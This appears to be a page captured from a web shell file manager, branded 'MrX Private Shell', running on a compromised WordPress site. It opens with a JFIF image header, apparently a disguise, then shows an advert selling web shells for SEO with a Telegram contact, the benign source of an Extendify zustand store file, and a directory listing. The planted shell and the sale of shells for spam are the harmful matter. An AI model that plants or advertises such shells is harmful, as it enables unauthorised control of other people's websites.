����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
import { create } from 'zustand';
import { devtools, persist } from 'zustand/middleware';
const state = (set) => ({
visibility: 'minimized', // open | minimized | closed
queuedTour: null,
queueTourForRedirect: (tour) => set({ queuedTour: tour }),
clearQueuedTour: () => set({ queuedTour: null }),
setVisibility: (visibility) => {
if (!['open', 'minimized', 'closed'].includes(visibility)) {
throw new Error('Invalid visibility state');
}
set({ visibility });
},
});
export const useGlobalSyncStore = create(
persist(devtools(state, { name: 'Extendify Help Center Globals Sync' }), {
name: `extendify-help-center-globals-sync-${window.extSharedData.siteId}`,
}),
);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| ai-chat.js | File | 1.14 KB | 0644 |
|
| globals-sync.js | File | 686 B | 0644 |
|
| knowledge-base.js | File | 2.22 KB | 0644 |
|
| tours.js | File | 6.51 KB | 0644 |
|
| user-selections.js | File | 985 B | 0644 |
|